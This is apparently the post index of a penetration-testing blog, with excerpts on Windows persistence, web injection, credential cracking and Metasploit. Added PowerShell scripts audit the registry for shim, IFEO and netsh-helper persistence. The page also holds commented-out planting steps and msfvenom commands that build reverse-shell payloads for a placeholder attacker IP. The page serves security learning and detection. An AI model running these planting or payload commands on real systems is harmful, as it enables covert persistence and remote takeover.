Pentesting
Feb 25, 2020
Persistence via Shims
Application Shimming. This’ll be a quick post on the Windows persistence method of Application Shimming, ATT&CK T1138 (since folded into T1546.011, Event Triggered Execution: Application Shimming). Microsoft developed a method for users/engineers to create custom fixes for application compatibility...
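Whichever side of the engagement you are on, the two registry locations that sdbinst.exe writes when a custom shim database is installed are the ones to know: InstalledSDB records each database, and Custom maps each shimmed executable to it. The PowerShell audit below is an added example and not code from the post; it only reads the registry. Treating a DatabasePath outside %SystemRoot%\AppPatch as suspicious is my own heuristic, based on sdbinst copying custom .sdb files into AppPatch\Custom.

```powershell
# Added example, not code from the post: list custom shim databases registered
# by sdbinst.exe. A persisted shim leaves two traces under AppCompatFlags:
#   InstalledSDB\{GUID}  -> DatabasePath, DatabaseDescription, install time
#   Custom\<exe name>    -> one value named {GUID}.sdb per database applied
$base = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags'

function Get-InstalledShimDatabase {
    Get-ChildItem -Path "$base\InstalledSDB" -ErrorAction SilentlyContinue | ForEach-Object {
        $p  = Get-ItemProperty -Path $_.PSPath
        $ts = if ($p.DatabaseInstallTimeStamp) { [DateTime]::FromFileTime([int64]$p.DatabaseInstallTimeStamp) } else { $null }
        [pscustomobject]@{
            Guid         = $_.PSChildName
            Description  = $p.DatabaseDescription
            DatabasePath = $p.DatabasePath
            Installed    = $ts
            # Assumption: sdbinst copies the .sdb into %SystemRoot%\AppPatch\Custom,
            # so a database stored anywhere else deserves a closer look.
            OutsideAppPatch = [bool]($p.DatabasePath -and $p.DatabasePath -notlike "$env:SystemRoot\AppPatch\*")
        }
    }
}

function Get-ShimmedExecutable {
    Get-ChildItem -Path "$base\Custom" -ErrorAction SilentlyContinue | ForEach-Object {
        $exe = $_.PSChildName
        foreach ($valueName in (Get-Item -Path $_.PSPath).GetValueNames()) {
            [pscustomobject]@{ Executable = $exe; ShimDatabase = $valueName }
        }
    }
}

Get-InstalledShimDatabase | Format-Table -AutoSize
Get-ShimmedExecutable     | Format-Table -AutoSize
# Removing a confirmed malicious database: sdbinst.exe -u <DatabasePath>
```

Run it elevated so both hives read fully; a database with a generic description, a recent install time and a path outside AppPatch is the combination to chase first.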
Nov 23, 2019
Persistence via IFEO
Image File Execution Options. This is a quick post on maintaining persistence with Image File Execution Options. IFEO is built-in Windows functionality for attaching debugger processes to other arbitrary...
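The mechanism is simple enough to show in a few lines: a subkey under Image File Execution Options named after an executable may carry a Debugger value, and when that executable starts Windows launches the Debugger command instead, appending the original command line. The PowerShell below is an added example, not code from the post. The commented-out planting step uses a hypothetical payload path; the audit function checks both the native and WOW6432Node views and looks at the signature of whatever each Debugger value points to.

```powershell
# Added example, not code from the post. Audit (and, commented out, plant)
# IFEO Debugger hooks. Both registry views matter on 64-bit Windows.
$ifeoRoots = @(
    'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
)

# Planting (needs admin). Target and payload path are hypothetical, shown only
# for contrast with the audit below.
# $k = Join-Path $ifeoRoots[0] 'notepad.exe'
# New-Item -Path $k -Force | Out-Null
# Set-ItemProperty -Path $k -Name Debugger -Value 'C:\Tools\payload.exe'

function Get-IfeoDebugger {
    foreach ($root in $ifeoRoots) {
        Get-ChildItem -Path $root -ErrorAction SilentlyContinue | ForEach-Object {
            $dbg = (Get-ItemProperty -Path $_.PSPath -Name Debugger -ErrorAction SilentlyContinue).Debugger
            if (-not $dbg) { return }   # no hook on this image name, next subkey
            # First token of the command line, quoted or not, is the binary that runs.
            $exe = if ($dbg -match '^"([^"]+)"') { $Matches[1] } else { ($dbg -split '\s+')[0] }
            $sig = if (Test-Path -LiteralPath $exe) { (Get-AuthenticodeSignature -FilePath $exe).Status } else { 'not found' }
            [pscustomobject]@{
                Image     = $_.PSChildName
                Debugger  = $dbg
                Binary    = $exe
                Signature = $sig   # anything other than Valid from a known debugger vendor deserves a look
                View      = if ($root -like '*WOW6432Node*') { 'WOW64' } else { 'native' }
            }
        }
    }
}

Get-IfeoDebugger | Format-Table -AutoSize
```

Legitimate entries from tooling such as Visual Studio's JIT debugger use full paths to signed binaries; a bare name, a path under a user profile, or a "not found" result is where to dig.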
Nov 6, 2019
Part 2: Living Off The Land
Intro. Another post dedicated to showcasing the naturally aspirated approach to executing, persisting and moving laterally throughout a Windows network. In this post we’ll dive into additional techniques, from utilizing...
Aug 31, 2019
Sentrifugo Exploits
Intro. Sentrifugo is a free and open-source Human Resource Management System (HRMS), primarily written in PHP, with many user-controlled features. After doing some research on version 3.2, I discovered...
Jun 16, 2019
WMI Persistence
WMI Basics. WMI is core Windows functionality that has shipped with the OS for a long time (see also DCOM and CIM). From Microsoft: “Windows Management...
Mar 12, 2019
DLL Hijacking
DLL Hijacking & Ghidra. DLL hijacking gets a Portable Executable (PE) to load an external library (DLL) it was never intended to run. Because of the DLL search order, one could implant a binary...
Jan 29, 2019
WebGoat 8 Install
Install WebGoat on Ubuntu 18.04. Check out the official OWASP documentation first, and use this as a supplementary guide during install. After a fresh install of Ubuntu Server 18.04 use sudo...
Oct 20, 2018
Living Off the Land
With Windows Binaries A naturally-aspirated approach focusing on the use of native built-in binaries to exploit and persist on target systems. Avoiding detection is a constant battle, so what’s the...
Sep 2, 2018
FI Cyberspace Scan
Cyberscan is a Local File Inclusion CLI tool written in Python to speed up LFI checks. Similar to using Burp or ZAP, but less bulky and resource intensive. Plus it’s in color...
Aug 4, 2018
SQLi
SQL Injection 101. Injection is generally the most common web application security risk and has been in the OWASP Top 10 since its inception. SQL injection is a category that falls...
Jul 28, 2018
Hack the Helpers
Netsh DLL Helpers. The native Microsoft command-line utility NetShell is an extensible tool for admins, pentesters and defenders. See a brief write-up of mine on its offensive functionality. One added...
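The extensibility point itself is one registry key: netsh.exe reads every value under HKLM\SOFTWARE\Microsoft\NetSh at startup and loads each DLL named there, and "netsh add helper" is just a write to that key. The PowerShell audit below is an added example and not code from the post. The helper path in the commented planting line is hypothetical; the "stock helpers are bare names that resolve from System32" rule is my assumption about how a clean key looks.

```powershell
# Added example, not code from the post. Enumerate netsh helper DLLs and flag
# the ones that do not look like the stock set.
function Get-NetshHelper {
    $key = Get-Item -Path 'HKLM:\SOFTWARE\Microsoft\NetSh'
    foreach ($name in $key.GetValueNames()) {
        if ([string]::IsNullOrEmpty($name)) { continue }   # skip (Default) if it is set
        $dll = $key.GetValue($name)
        # Assumption: stock helpers are bare file names resolved from System32;
        # a rooted path is exactly what "netsh add helper C:\somewhere\x.dll" writes.
        $resolved = if ([IO.Path]::IsPathRooted($dll)) { $dll } else { Join-Path "$env:SystemRoot\System32" $dll }
        $exists   = Test-Path -LiteralPath $resolved
        [pscustomobject]@{
            Helper     = $name
            Dll        = $dll
            Resolved   = $resolved
            InSystem32 = $resolved -like "$env:SystemRoot\System32\*"
            Exists     = $exists
            Signature  = if ($exists) { (Get-AuthenticodeSignature -FilePath $resolved).Status } else { 'not found' }
        }
    }
}

# Anything outside System32, unsigned, or missing on disk is the place to start.
Get-NetshHelper | Sort-Object InSystem32, Signature | Format-Table -AutoSize

# Planting, for contrast (needs admin; the path is hypothetical):
#   netsh add helper C:\Tools\helper.dll
# Removing a confirmed rogue helper:
#   netsh delete helper C:\Tools\helper.dll
```

Because the DLL runs inside netsh.exe, a hit here also explains otherwise puzzling child processes or network connections spawned by netsh in EDR telemetry.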
Jul 14, 2018
Intro to Empire
Crush the Rebellion. Empire is an outstanding post-exploitation framework for Windows targets. This post will go through the basics, from app install to creating a backdoor. I’d recommend grabbing...
Jul 8, 2018
Metasploitable 3 Install
Install Metasploitable. Here’s the process to install Metasploitable 3 on Windows and Kali Linux. I had a hell of a time getting it working properly, so decided to throw my...
Jun 27, 2018
Private-i
Linux PrivEsc: Private-i. Private-i is a custom Linux enumeration tool to assist in privilege escalation by automating tasks. This post is a simple quick overview; check out the GitHub repo to...
May 19, 2018
Log Poisoning - LFI to RCE
LFI to RCE. Converting local file inclusion to remote command execution can be tricky or even impossible in many cases. Depending on system configuration, you may be able to pass arbitrary...
Apr 19, 2018
Cracking Creds
Cracking. You’ve found a hash and now you want to crack it? First, it’s important to identify what type of hash you’re working with. You may know from experience...
Apr 11, 2018
Netshell
Netshell in a Nutshell. A versatile network utility built into every Windows release since Windows 2000. If you’ve compromised a Windows target and don’t have a fancy Meterpreter shell, netsh...
Apr 4, 2018
LFI & RFI
LFI Quick Guide. If you’re relatively new to pentesting, the whole LFI concept can be a bit confusing, especially when trying to convert that LFI vulnerability to a shell. Below is...
Mar 10, 2018
ZAP Quick Guide
OWASP Zed Attack Proxy OWASP ZAP is another excellent tool for pentesting web applications. It’s installed by default within Kali and is completely free. It’s not necessarily a mass vulnerability...
Feb 27, 2018
Notes Dump
Personal notes dump from testing on VulnHub machines and getting through the OSCP. Anything explicitly from OSCP lab machines has been removed.
Hashcat
hashcat64.exe -m 1000 -a 0...
Feb 10, 2018
MSF Venom Quick Guide
Generation Commands
Linux staged Meterpreter: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=YourIP LPORT=YourPort -f elf > shell-meterp.elf
Linux inline (stageless) Meterpreter: msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=YourIP LPORT=YourPort -f elf > santas.elf
Windows executable with Meterpreter: msfvenom...